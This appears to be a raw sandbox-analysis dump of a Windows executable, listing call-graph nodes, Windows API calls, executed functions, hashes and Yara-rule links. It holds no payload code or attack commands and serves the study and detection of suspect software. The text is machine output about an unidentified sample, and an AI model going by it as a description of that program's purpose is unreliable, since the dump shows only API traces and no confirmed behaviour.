7664->7662 7665->7664 7666 1400168c0 HeapFree 7665->7666 7667 140012360 HeapFree 7665->7667 7666->7665 7667->7665 7668 14000bc0c 7669 14000bc19 EnableWindow 7668->7669 7670 14000bc2b 7668->7670 7669->7670 7671 140014810 7672 14001482a 7671->7672 7673 140014869 7671->7673 7672->7673 7674 14001483f memmove memmove 7672->7674 7674->7673 7675 140016410 malloc 8356 140012390 HeapFree HeapFree 7987 14000c490 7992 14000c6e0 7987->7992 7990 14000c4c6 7991 14000c4ab GetCurrentProcess TerminateProcess 7991->7990 7995 14000c4f0 7992->7995 7996 14000c510 7995->7996 7996->7996 7997 14000c562 RtlLookupFunctionEntry 7996->7997 7998 14000c5b4 RtlLookupFunctionEntry 7997->7998 8000 14000c5f3 7997->8000 7998->8000 8001 14000c499 7998->8001 7999 14000c61b RtlVirtualUnwind 7999->8000 7999->8001 8000->7999 8000->8001 8002 14000c664 RtlLookupFunctionEntry 8000->8002 8001->7990 8001->7991 8002->8000 8002->8001 8228 140002914 8229 140012360 HeapFree 8228->8229 8230 140002926 8229->8230 8003 140012e97 8004 140012ead 8003->8004 8006 140012ea0 8003->8006 8005 140014d80 3 API calls 8004->8005 8004->8006 8005->8006 7676 14000281c 7683 140012600 TlsGetValue 7676->7683 7678 140002821 7679 140012360 HeapFree 7678->7679 7680 140002835 7679->7680 7681 140012360 HeapFree 7680->7681 7682 140002847 7681->7682 7683->7678 7684 140016420 free 8231 140017120 8232 1400171ae malloc 8231->8232 8233 140017140 MultiByteToWideChar 8231->8233 8234 1400171bc 8232->8234 8233->8232 8236 14001716d malloc MultiByteToWideChar 8233->8236 8236->8234 8007 14000bea0 GetWindowThreadProcessId GetCurrentThreadId 8008 14000bf31 8007->8008 8009 14000bec1 IsWindowVisible 8007->8009 8009->8008 8010 14000bece 8009->8010 8011 140011cb0 HeapAlloc 8010->8011 8012 14000bedf GetCurrentThreadId GetWindowLongPtrW 8011->8012 8013 14000bf06 8012->8013 8014 14000bf0a GetForegroundWindow 8012->8014 8013->8014 8014->8008 8015 14000bf15 IsWindowEnabled 8014->8015 8015->8008 8016 14000bf22 EnableWindow 8015->8016 8016->8008 7685 140013021 7687 140013026 7685->7687 7686 140014d80 3 API calls 7689 140012f79 7686->7689 7688 1400132aa memmove 7687->7688 7687->7689 7690 1400132ba 7687->7690 7688->7690 7690->7686 7690->7689 8017 1400034a2 8030 140012600 TlsGetValue 8017->8030 8019 1400034a7 8020 140012360 HeapFree 8019->8020 8021 1400034bb 8020->8021 8022 140012360 HeapFree 8021->8022 8023 1400034cd 8022->8023 8024 140012360 HeapFree 8023->8024 8025 1400034df 8024->8025 8026 140012360 HeapFree 8025->8026 8027 1400034f1 8026->8027 8028 140012360 HeapFree 8027->8028 8029 140003503 8028->8029 8030->8019 7691 140011024 7692 140011032 TlsFree 7691->7692 7693 14001103e 7691->7693 7692->7693 7694 14000e824 7695 14000e8e4 7694->7695 7703 14000fee4 7695->7703 7704 14000ff0b 7703->7704 7705 14000ff92 7704->7705 7706 14000ff47 memmove 7704->7706 7710 14000ea48 7706->7710 7708 14000ea48 memmove 7709 14000ff70 7708->7709 7709->7705 7709->7708 7711 14000ea81 7710->7711 7712 14000ea71 memmove 7710->7712 7711->7709 7712->7711 8375 140010fa8 8376 140010fbe 8375->8376 8377 140010fdd HeapFree 8376->8377 8378 140010fef 8376->8378 8377->8378 8379 1400021a8 8380 1400021ab 8379->8380 8381 140012360 HeapFree 8380->8381 8382 1400021ba 8381->8382 8383 140012360 HeapFree 8382->8383 8384 1400021cc 8383->8384 8385 140012360 HeapFree 8384->8385 8386 1400021de 8385->8386 7713 14001162c 7718 14001147c 7713->7718 7716 140011646 memset 7717 140011659 7716->7717 7719 1400114a4 7718->7719 7720 14001149a EnterCriticalSection 7718->7720 7721 14001155e HeapAlloc 7719->7721 7725 1400114b1 7719->7725 7720->7719 7722 140011586 HeapAlloc 7721->7722 7721->7725 7722->7725 7723 140011606 7723->7716 7723->7717 7724 1400115fc LeaveCriticalSection 7724->7723 7725->7723 7725->7724 7726 14000b62c 7727 14000b635 HeapFree 7726->7727 7728 14000b647 7726->7728 7727->7728 8040 1400040ac 8041 1400123e0 21 API calls 8040->8041 8042 1400040ce 8041->8042 8043 14000d6a0 5 API calls 8042->8043 8044 1400040da 8043->8044 8053 1400121c0 GetLastError TlsGetValue SetLastError 8044->8053 8046 1400040e4 8054 1400121c0 GetLastError TlsGetValue SetLastError 8046->8054 8048 1400040f8 8055 14000ca00 8048->8055 8052 140004122 8053->8046 8054->8048 8056 14000ca20 8055->8056 8057 1400126d0 2 API calls 8056->8057 8058 14000ca34 8057->8058 8059 14000ca3b memmove 8058->8059 8060 14000410d 8058->8060 8059->8060 8061 140012210 TlsGetValue 8060->8061 8062 140012251 HeapAlloc 8061->8062 8063 140012276 HeapReAlloc 8061->8063 8064 1400122a1 8062->8064 8063->8064 8064->8052 8237 14000432e 8240 140012600 TlsGetValue 8237->8240 8239 140004333 8240->8239 7729 140011a30 InitializeCriticalSection 8065 1400136b0 8066 1400136bf 8065->8066 8067 140013750 memmove 8066->8067 8068 140014393 8066->8068 8070 14001378b 8066->8070 8067->8070 8069 140014d80 3 API calls 8068->8069 8068->8070 8069->8070 8241 140016f30 8242 140016f60 8241->8242 8242->8242 8243 140016f6b MultiByteToWideChar 8242->8243 8244 1400126d0 2 API calls 8243->8244 8245 140016f97 MultiByteToWideChar 8244->8245 7538 14000c6b0 7539 14000c6d1 7538->7539 7540 14000c6c0 RemoveVectoredExceptionHandler 7538->7540 7540->7539 7730 140007a30 7731 140007a50 9 API calls 7730->7731 7732 140007a49 7731->7732 7733 140008230 7734 140008260 12 API calls 7733->7734 7735 140008251 7734->7735 8071 140008eb5 8072 140008ee3 8071->8072 8073 140008ec9 8071->8073 8076 140008ed4 8072->8076 8087 14000afc0 8072->8087 8073->8076 8077 140009da0 8073->8077 8078 140009dc9 8077->8078 8080 140009e0d 8077->8080 8097 14000b510 8078->8097 8080->8080 8081 140009da0 _wcsicmp 8080->8081 8084 140009de0 8080->8084 8082 140009e66 8081->8082 8083 140009da0 _wcsicmp 8082->8083 8086 140009e79 8083->8086 8084->8076 8085 14000b510 _wcsicmp 8085->8086 8086->8084 8086->8085 8088 14000afe9 8087->8088 8090 14000b02d 8087->8090 8089 14000b510 _wcsicmp 8088->8089 8094 14000b000 8089->8094 8090->8090 8091 14000afc0 _wcsicmp 8090->8091 8090->8094 8092 14000b086 8091->8092 8093 14000afc0 _wcsicmp 8092->8093 8096 14000b099 8093->8096 8094->8076 8095 14000b510 _wcsicmp 8095->8096 8096->8094 8096->8095 8098 14000b524 8097->8098 8099 14000b515 8097->8099 8098->8084 8100 1400070cc _wcsicmp 8099->8100 8101 14000b51e 8099->8101 8100->8084 8100->8097 8101->8084 8246 140014535 8247 14001455a 8246->8247 8247->8247 8248 140014779 memmove 8247->8248 8249 1400145dc 8247->8249 8248->8249 7736 14000bc38 7737 14000bc84 7736->7737 7738 14000bc4c 7736->7738 7738->7737 7739 14000bc51 SendMessageW Sleep PostMessageW 7738->7739 7739->7737 7744 14000e83b HeapAlloc 7745 14000e87d 7744->7745 7746 14000303f 7757 140012600 TlsGetValue 7746->7757 7748 140003044 7749 140012360 HeapFree 7748->7749 7750 140003058 7749->7750 7751 140012360 HeapFree 7750->7751 7752 14000306a 7751->7752 7753 140012360 HeapFree 7752->7753 7754 14000307c 7753->7754 7755 140012360 HeapFree 7754->7755 7756 14000308e 7755->7756 7757->7748 7758 14000c040 7763 140011248 EnterCriticalSection 7758->7763 7761 14000c075 7762 14000c05d CloseHandle 7762->7761 7764 14001127a LeaveCriticalSection 7763->7764 7765 14001126c 7763->7765 7766 14000c058 7764->7766 7765->7764 7766->7761 7766->7762 8102 1400048c0 8111 140012600 TlsGetValue 8102->8111 8104 1400048c5 8105 140012360 HeapFree 8104->8105 8106 1400048d9 8105->8106 8107 140012360 HeapFree 8106->8107 8108 1400048eb 8107->8108 8109 140012360 HeapFree 8108->8109 8110 1400048fd 8109->8110 8111->8104 8250 14000e540 8251 140011248 2 API calls 8250->8251 8252 14000e55f 8251->8252 8253 14000b740 8256 14000b758 8253->8256 8296 14000b5d8 8256->8296 8258 14000b790 8259 14000b5d8 2 API calls 8258->8259 8260 14000b79b 8259->8260 8261 14000b5d8 2 API calls 8260->8261 8262 14000b7a6 8261->8262 8263 14000b7b2 GetStockObject 8262->8263 8264 14000b7c3 LoadIconW LoadCursorW RegisterClassExW 8262->8264 8263->8264 8265 14000be5c 3 API calls 8264->8265 8266 14000b83f 8265->8266 8267 14000bf44 7 API calls 8266->8267 8268 14000b84d 8267->8268 8269 14000b859 IsWindowEnabled 8268->8269 8270 14000b87a 8268->8270 8269->8270 8271 14000b863 EnableWindow 8269->8271 8272 14000be5c 3 API calls 8270->8272 8271->8270 8273 14000b886 GetSystemMetrics GetSystemMetrics CreateWindowExW 8272->8273 8274 14000b902 6 API calls 8273->8274 8275 14000bb96 8273->8275 8276 14000ba12 SendMessageW wcslen wcslen SendMessageW 8274->8276 8277 14000ba53 CreateWindowExW SendMessageW CreateAcceleratorTableW SetForegroundWindow BringWindowToTop 8274->8277 8278 14000bba4 8275->8278 8299 1400127b0 TlsGetValue 8275->8299 8276->8277 8281 14000bb48 8277->8281 8279 14000bba9 HeapFree 8278->8279 8280 14000bbbb 8278->8280 8279->8280 8283 14000bbd2 8280->8283 8284 14000bbc0 HeapFree 8280->8284 8285 14000bb51 8281->8285 8286 14000bb0a GetMessageW 8281->8286 8288 14000bbd7 HeapFree 8283->8288 8289 14000b751 8283->8289 8284->8283 8290 14000bb56 DestroyAcceleratorTable 8285->8290 8291 14000bb5f 8285->8291 8286->8285 8287 14000bb20 TranslateAcceleratorW 8286->8287 8287->8281 8292 14000bb34 TranslateMessage DispatchMessageW 8287->8292 8288->8289 8290->8291 8291->8275 8293 14000bb68 wcslen 8291->8293 8292->8281 8294 1400126d0 2 API calls 8293->8294 8295 14000bb77 wcscpy HeapFree 8294->8295 8295->8275 8297 14000b5ea wcslen HeapAlloc 8296->8297 8298 14000b60e 8296->8298 8297->8298 8298->8258 8299->8278 7767 14000c444 7768 14000c455 7767->7768 7769 14000c44d SetEnvironmentVariableW 7767->7769 7769->7768 8112 14000cec4 8113 14000cf4b 8112->8113 8114 14000cee9 8112->8114 8114->8113 8116 14000cf02 8114->8116 8120 14000d140 8114->8120 8116->8113 8119 140016538 5 API calls 8116->8119 8127 14000d1f0 8116->8127 8136 14000d02c 8116->8136 8119->8116 8121 14000d15b 8120->8121 8122 14000d1b4 memset 8121->8122 8123 14000d163 HeapFree 8121->8123 8125 1400168c0 HeapFree 8121->8125 8126 1400116f4 3 API calls 8121->8126 8124 14000d1d0 8122->8124 8123->8121 8124->8116 8125->8121 8126->8121 8128 14000d230 8127->8128 8130 14000d210 8127->8130 8129 14001147c 4 API calls 8128->8129 8135 14000d22e 8129->8135 8130->8128 8131 14000d21d 8130->8131 8133 1400168c0 HeapFree 8131->8133 8131->8135 8132 14000d295 8132->8116 8133->8135 8134 14000d281 memset 8134->8132 8135->8132 8135->8134 8137 14000d073 8136->8137 8138 14000d04c 8136->8138 8142 14000d08f 8137->8142 8157 14000d3a4 8137->8157 8151 14000cf74 8138->8151 8141 14000d051 8141->8137 8143 14000d059 8141->8143 8144 14001147c 4 API calls 8142->8144 8145 14000d06e 8143->8145 8149 1400168c0 HeapFree 8143->8149 8146 14000d0a6 8144->8146 8147 14000d11c 8145->8147 8148 14000d108 memset 8145->8148 8146->8147 8150 14000d0ae wcslen HeapAlloc wcscpy 8146->8150 8147->8116 8148->8147 8149->8145 8150->8145 8152 14000cfa2 8151->8152 8154 14000cfe2 8151->8154 8153 14000d3a4 tolower 8152->8153 8155 14000cfa7 8153->8155 8154->8155 8156 14000cff8 wcscmp 8154->8156 8155->8141 8156->8154 8156->8155 8158 14000d3c7 tolower 8157->8158 8159 14000d3b8 8158->8159 8160 14000d3d0 8158->8160 8159->8158 8160->8142 8300 140003144 8301 140003147 8300->8301 8302 140012360 HeapFree 8301->8302 8303 140003156 8302->8303 8304 140012360 HeapFree 8303->8304 8305 140003168 8304->8305 7770 140002648 7771 14000264f 7770->7771 7772 140012360 HeapFree 7771->7772 7773 140002666 7772->7773 7774 140012360 HeapFree 7773->7774 7775 140002678 7774->7775 7776 140012360 HeapFree 7775->7776 7777 14000268a 7776->7777 7778 140012360 HeapFree 7777->7778 7779 14000269c 7778->7779 7780 140012360 HeapFree 7779->7780 7781 1400026ae 7780->7781 8161 1400088c9 8162 1400088e0 8161->8162 8163 1400088fa 8161->8163 8164 140009da0 _wcsicmp 8162->8164 8166 1400088eb 8162->8166 8165 14000afc0 _wcsicmp 8163->8165 8163->8166 8164->8166 8165->8166 7782 14000b64c 7783 14000b667 7782->7783 7784 14000b70e UnregisterClassW 7782->7784 7785 14000b68b 7783->7785 7787 14000b674 DefWindowProcW 7783->7787 7788 14000b67f 7783->7788 7786 14000b72c 7784->7786 7785->7786 7789 14000b6ea EnableWindow 7785->7789 7790 14000b6fc 7785->7790 7787->7786 7788->7785 7791 14000b695 GetWindowLongPtrW GetWindowTextLengthW HeapAlloc GetWindowTextW 7788->7791 7789->7790 7794 14000bf44 7790->7794 7791->7785 7795 14000bf57 EnumWindows 7794->7795 7796 14000bfbb 7794->7796 7798 14000b703 DestroyWindow 7795->7798 7799 14000bf77 GetCurrentThreadId 7795->7799 7797 14000bfc7 GetCurrentThreadId 7796->7797 7796->7798 7801 14000bfdb EnableWindow 7796->7801 7803 14000bff0 SetWindowPos 7796->7803 7805 140011c68 7796->7805 7797->7796 7798->7786 7800 14000bf85 7799->7800 7800->7798 7800->7799 7802 14000bf8b SetWindowPos 7800->7802 7801->7796 7802->7800 7803->7796 7806 140011c74 HeapFree 7805->7806 7808 14001f820 7806->7808 8167 1400130cb 8169 1400130d0 8167->8169 8168 140014d80 3 API calls 8172 140013480 8168->8172 8170 1400132ba 8169->8170 8171 1400132aa memmove 8169->8171 8170->8168 8170->8172 8171->8170 8306 140002b4c 8307 1400123e0 21 API calls 8306->8307 8308 140002b6a 8307->8308 8391 140016fd0 8392 140017000 8391->8392 8392->8392 8393 14001700b MultiByteToWideChar malloc MultiByteToWideChar 8392->8393 7510 14000de50 7528 1400112a8 EnterCriticalSection 7510->7528 7512 14000de98 7513 14000deb6 7512->7513 7514 14000defb 7512->7514 7522 14000e04d 7512->7522 7515 14000dec9 7513->7515 7516 14000decd CreateFileW 7513->7516 7517 14000df42 7514->7517 7518 14000df00 7514->7518 7515->7516 7524 14000dfb7 7516->7524 7521 14000df5f CreateFileW 7517->7521 7517->7524 7519 14000df13 7518->7519 7520 14000df17 CreateFileW 7518->7520 7519->7520 7520->7524 7523 14000df8d CreateFileW 7521->7523 7521->7524 7523->7524 7524->7522 7525 14000dfe1 HeapAlloc 7524->7525 7526 14000dff9 7524->7526 7525->7526 7526->7522 7527 14000e036 SetFilePointer 7526->7527 7527->7522 7529 1400112e3 7528->7529 7530 1400112d0 7528->7530 7531 140011312 7529->7531 7532 1400112e9 HeapReAlloc 7529->7532 7533 140011cb0 HeapAlloc 7530->7533 7535 14001132d HeapAlloc 7531->7535 7537 14001131d 7531->7537 7532->7531 7534 1400112de 7533->7534 7536 140011352 LeaveCriticalSection 7534->7536 7535->7537 7536->7512 7537->7536 8173 1400086d0 8174 140008701 8173->8174 8175 1400086ee 8173->8175 8176 140008710 CharLowerW CharLowerW 8174->8176 8177 14000873e 8174->8177 8176->8174 8176->8177 7809 140002853 7830 1400123e0 7809->7830 7813 14000286b 7843 1400121c0 GetLastError TlsGetValue SetLastError 7813->7843 7815 140002889 7844 140012450 7815->7844 7817 140002898 7849 1400121c0 GetLastError TlsGetValue SetLastError 7817->7849 7819 1400028a6 7850 1400121c0 GetLastError TlsGetValue SetLastError 7819->7850 7821 1400028ba 7851 14000c8e0 7821->7851 7825 1400028d4 7856 1400125d0 TlsGetValue 7825->7856 7827 1400028e5 7857 14000b574 7827->7857 7829 1400028fb 7831 1400123ed 7830->7831 7832 14001240f TlsGetValue 7830->7832 7835 140012060 5 API calls 7831->7835 7833 140002861 7832->7833 7834 140012420 7832->7834 7842 1400121c0 GetLastError TlsGetValue SetLastError 7833->7842 7873 140012bf0 HeapAlloc HeapAlloc TlsSetValue 7834->7873 7836 1400123f2 TlsGetValue 7835->7836 7864 140016cc4 7836->7864 7839 140012425 TlsGetValue 7841 140016cc4 13 API calls 7839->7841 7841->7833 7842->7813 7843->7815 7845 140012477 7844->7845 7846 140012469 wcslen 7844->7846 7847 1400126d0 2 API calls 7845->7847 7846->7845 7848 140012485 7847->7848 7848->7817 7849->7819 7850->7821 7852 14000c8f0 7851->7852 7853 1400126d0 2 API calls 7852->7853 7854 1400028ca 7853->7854 7855 140012520 TlsGetValue 7854->7855 7855->7825 7856->7827 7874 14000be5c GetForegroundWindow 7857->7874 7860 14000bf44 7 API calls 7861 14000b5a3 MessageBoxW 7860->7861 7862 14000bf44 7 API calls 7861->7862 7863 14000b5bf 7862->7863 7863->7829 7865 140016cf2 TlsAlloc InitializeCriticalSection 7864->7865 7866 140016d11 TlsGetValue 7864->7866 7865->7866 7867 140016de6 HeapAlloc 7866->7867 7868 140016d29 HeapAlloc 7866->7868 7869 14001240d 7867->7869 7868->7869 7870 140016d49 EnterCriticalSection 7868->7870 7869->7833 7871 140016d61 7 API calls 7870->7871 7872 140016d5e 7870->7872 7871->7867 7872->7871 7873->7839 7875 14000b596 7874->7875 7876 14000be76 GetWindowThreadProcessId GetCurrentProcessId 7874->7876 7875->7860 7876->7875 8394 1400031d9 8395 1400031dc 8394->8395 8396 140012360 HeapFree 8395->8396 8397 1400031eb 8396->8397 8398 14000c3dc GetEnvironmentVariableW 8399 14000c408 8398->8399 8400 1400126d0 2 API calls 8399->8400 8401 14000c413 GetEnvironmentVariableW 8400->8401 8178 1400076e0 8179 14000773d 8178->8179 8181 1400076f1 8178->8181 8180 140007729 wcsstr 8180->8179 8181->8179 8181->8180 8315 140007760 8316 1400077e7 8315->8316 8317 140007769 8315->8317 8317->8316 8318 1400077b9 8317->8318 8319 1400077c0 wcsstr 8317->8319 8322 1400085f0 8318->8322 8321 1400077be 8319->8321 8323 14000869f 8322->8323 8324 140008617 CharLowerW 8322->8324 8323->8321 8325 140008630 8324->8325 8325->8323 8325->8325 8326 14000864c CharLowerW 8325->8326 8327 140008670 CharLowerW CharLowerW 8325->8327 8326->8325 8327->8325

                                                              Executed Functions

                                                              Function 000000014000D9C4 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 46libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: LibraryPath$AddressAllocFreeHeapLoadLongNameProcTempValue
                                                              • String ID: GetLongPathNameW$Kernel32.DLL
                                                              • API String ID: 820969696-2943376620
                                                              • Opcode ID: 7b5facb765f8cdd7be91ebb16a2403b7b75564631065215e584da20e470a0f22
                                                              • Instruction ID: 08c74a34c6d82e646fe97c561cc400b119dc1938ee8d5d8dcc972cb306c03a44
                                                              • Opcode Fuzzy Hash: 7b5facb765f8cdd7be91ebb16a2403b7b75564631065215e584da20e470a0f22
                                                              • Instruction Fuzzy Hash: 17116D31721B4086EF159F27A9843A967A1FB8CFC0F481029EF4E4B7A5DE39C8528340
                                                              Function 0000000140001E57 Relevance: 9.3, APIs: 6, Instructions: 259COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: File$NameTemp$Heap$AllocErrorLastPathValue$AttributesBackslashCreateDeleteDirectoryExtensionFreeRenamememmovewcslenwcsncpy
                                                              • String ID:
                                                              • API String ID: 4232179356-0
                                                              • Opcode ID: f37d14f45d1a2abd6f91fd25c4a0b9dbf2c58692b7ebd1d65ebe457cd595aad6
                                                              • Instruction ID: 2ef6d83f5e2b3c8fb19d65fceeff62dc40447b47a2c1a218917e14d6a90cbc88
                                                              • Opcode Fuzzy Hash: f37d14f45d1a2abd6f91fd25c4a0b9dbf2c58692b7ebd1d65ebe457cd595aad6
                                                              • Instruction Fuzzy Hash: E38162FBE69644E5EA07B763BC86BED5220D3AD3D4F504410FF08062A3EE3995E64B10
                                                              Function 000000014000DE50 Relevance: 9.2, APIs: 6, Instructions: 151filememoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 94 14000de50-14000de9e call 1400112a8 97 14000dea4-14000deb4 94->97 98 14000e098-14000e09b 94->98 100 14000deb6-14000dec7 97->100 101 14000defb-14000defe 97->101 99 14000e07f-14000e097 98->99 102 14000dec9 100->102 103 14000decd-14000def6 CreateFileW 100->103 104 14000df42-14000df46 101->104 105 14000df00-14000df11 101->105 102->103 106 14000dfbc-14000dfc0 103->106 109 14000dfb7 104->109 110 14000df48-14000df59 104->110 107 14000df13 105->107 108 14000df17-14000df40 CreateFileW 105->108 113 14000dfc6-14000dfc9 106->113 114 14000e05d-14000e06f call 1400111dc 106->114 107->108 108->106 109->106 111 14000df5b 110->111 112 14000df5f-14000df8b CreateFileW 110->112 111->112 112->113 115 14000df8d-14000dfb5 CreateFileW 112->115 113->114 116 14000dfcf-14000dfd8 113->116 118 14000e074-14000e07c 114->118 115->106 119 14000dff9 116->119 120 14000dfda-14000dfdf 116->120 118->99 122 14000dffd-14000e02d 119->122 120->119 121 14000dfe1-14000dff7 HeapAlloc 120->121 121->122 123 14000e04d-14000e05b 122->123 124 14000e02f-14000e034 122->124 123->114 123->118 124->123 125 14000e036-14000e047 SetFilePointer 124->125 125->123
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: File$Create$CriticalSection$AllocEnterHeapLeavePointer
                                                              • String ID:
                                                              • API String ID: 2685021396-0
                                                              • Opcode ID: bf349e5ae30ca8a1459a9c900c950eddfabbaec973a548aea2fdccc3e75a92be
                                                              • Instruction ID: 9fd7d13fb8664e67d48ce56ae15862c74b29b4b7423edb5d501112f331116329
                                                              • Opcode Fuzzy Hash: bf349e5ae30ca8a1459a9c900c950eddfabbaec973a548aea2fdccc3e75a92be
                                                              • Instruction Fuzzy Hash: 2B51D4B261469086E761CF17F9007AA7690B39CBE4F04873AFF6A47BE4DB79C4419B10
                                                              Function 000000014000593C Relevance: 7.0, APIs: 4, Instructions: 980COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 126 14000593c-14000593e 127 140005945-140005954 126->127 127->127 128 140005956-140005979 call 1400123e0 127->128 131 14000597b-140005987 128->131 132 140005a39-140005a53 131->132 133 14000598d-140005a33 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 131->133 135 140005a55-140005a61 132->135 133->131 133->132 137 140005b13-140005b2d 135->137 138 140005a67-140005b0d call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 135->138 141 140005b2f-140005b3b 137->141 138->135 138->137 144 140005b41-140005be7 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 141->144 145 140005bed-140005c07 141->145 144->141 144->145 149 140005c09-140005c15 145->149 153 140005cc7-140005ce1 149->153 154 140005c1b-140005cc1 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 149->154 159 140005ce3-140005cef 153->159 154->149 154->153 160 140005da1-140005dbb 159->160 161 140005cf5-140005d91 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 159->161 168 140005dbd-140005dc9 160->168 284 140005d96-140005d9b 161->284 175 140005e7f-140005e99 168->175 176 140005dcf-140005e79 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 168->176 184 140005e9b-140005ea7 175->184 176->168 176->175 192 140005f5d-140005f77 184->192 193 140005ead-140005f57 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 184->193 201 140005f79-140005f85 192->201 193->184 193->192 209 14000603b-140006055 201->209 210 140005f8b-140006035 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 201->210 219 140006057-140006063 209->219 210->201 210->209 228 140006119-14000657b call 1400121c0 call 140012450 * 2 call 140012210 call 1400121c0 * 2 call 1400047e2 call 140012210 call 14000c2bc GetModuleHandleW call 1400121c0 * 4 call 140010ba0 call 1400125d0 call 140007dc0 call 140012210 call 1400121c0 * 4 call 140010ba0 call 1400125d0 call 140007dc0 call 140012210 call 140004134 call 1400121c0 * 2 call 140002c46 call 140006a58 call 140001e57 call 1400067aa call 1400121c0 * 2 call 14000ca70 call 1400049ea call 140012210 PathRemoveBackslashW call 140002bab call 1400121c0 * 3 call 140003cc9 call 140012520 call 1400125d0 call 14000c45c call 140006a58 call 1400121c0 call 140012450 * 2 call 140012210 call 1400121c0 * 2 call 1400026bb call 140012210 call 140004ee2 call 1400121c0 call 140012450 call 140012210 PathQuoteSpacesW call 1400121c0 call 140012450 * 3 call 140012210 PathQuoteSpacesW 219->228 229 140006069-140006113 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 219->229 428 1400065a1-1400065a6 call 140003ddc 228->428 429 14000657d-14000659f call 140007284 228->429 229->219 229->228 284->159 284->160 432 1400065ab-1400067a9 call 1400121c0 * 2 call 140012450 * 3 call 140012520 call 1400121c0 * 2 call 14000daa8 call 140012520 call 1400121c0 call 140012450 * 2 call 1400125d0 * 3 call 1400029c8 call 140006a58 call 140002930 call 140012360 * 10 428->432 429->432
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000011.00000002.1814887305.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814960069.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1814996664.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000011.00000002.1815030266.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Value$HeapPath$AllocCriticalErrorLastQuoteSectionSpaces$BackslashCharCreateEnterEnvironmentFileFreeHandleLeaveModuleNameRemoveTempThreadUpperVariablewcslen
                                                              • String ID:
                                                              • API String ID: 2499486723-0
                                                              • Opcode ID: 01fd8b8b98fab0c980f96e61b2251792a09e9ddd7d05bec7d734751dcc1b6e06
                                                              • Instruction ID: 5e2f233be3bb1e1a489454234068146e28d45b36aeb09ace1181e30b51997f55
                                                              • Opcode Fuzzy Hash: 01fd8b8b98fab0c980f96e61b2251792a09e9ddd7d05bec7d734751dcc1b6e06
                                                              • Instruction Fuzzy Hash: 6C722BB6E25548D6EA16B7B7B8877E95220A3AD394F500411FF4C0B363EE39C5F64B10
                                                              Function 000000014000E620 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.1814921554.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
